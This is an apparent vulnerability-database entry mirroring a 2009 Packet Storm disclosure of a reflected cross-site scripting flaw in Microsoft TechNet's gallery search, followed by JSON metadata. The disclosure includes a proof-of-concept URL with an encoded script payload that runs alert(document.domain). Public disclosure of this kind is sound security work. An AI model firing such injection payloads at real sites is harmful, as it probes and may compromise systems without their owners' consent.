Search...

Microsoft Technet Cross Site Scripting

2009-12-01T00:00:00

ID PACKETSTORM:83314
Type packetstorm
Reporter TEAMELITE
Modified 2009-12-01T00:00:00

Description

                                        
                                            `A cross site scripting vulnerability was discovered by t3am3lite on the Microsoft technet site.  
  
Full blog with screenshots:  
  
http://security-sh3ll.blogspot.com/2009/11/microsoft-technet-vulnerable-to-cross.html  
  
  
Exploitation:  
  
http://gallery.technet.microsoft.com/ScriptCenter/en-us/site/search?f[0].Type=%27Tag&f[0].Value=%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/83314/technet-xss.txt", "sourceData": "`A cross site scripting vulnerability was discovered by t3am3lite on the Microsoft technet site. \n \nFull blog with screenshots: \n \nhttp://security-sh3ll.blogspot.com/2009/11/microsoft-technet-vulnerable-to-cross.html \n \n \nExploitation: \n \nhttp://gallery.technet.microsoft.com/ScriptCenter/en-us/site/search?f[0].Type=%27Tag&f[0].Value=%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E \n \n`\n", "edition": 1, "references": [], "modified": "2009-12-01T00:00:00", "hash": "8e892054b08dadc18296389b30b9a427d8f13b50ff65a76481ec6dc0ca3b13e3", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/83314/Microsoft-Technet-Cross-Site-Scripting.html", "description": "", "id": "PACKETSTORM:83314", "reporter": "TEAMELITE", "lastseen": "2016-11-03T10:21:43", "published": "2009-12-01T00:00:00", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Microsoft Technet Cross Site Scripting", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "d537d395c815748d861afadcfe885420", "key": "href"}, {"hash": "2288afdd561c3802033dad01d3734f5a", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "2288afdd561c3802033dad01d3734f5a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5f3496f19f5039c2aa72507b8b92d2f4", "key": "reporter"}, {"hash": "b75dda4f6deafe3337f51142367cb67e", "key": "sourceData"}, {"hash": "173780cd958323810ee74da1831e52c6", "key": "sourceHref"}, {"hash": "1605df3257539047f76e1393800a7967", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}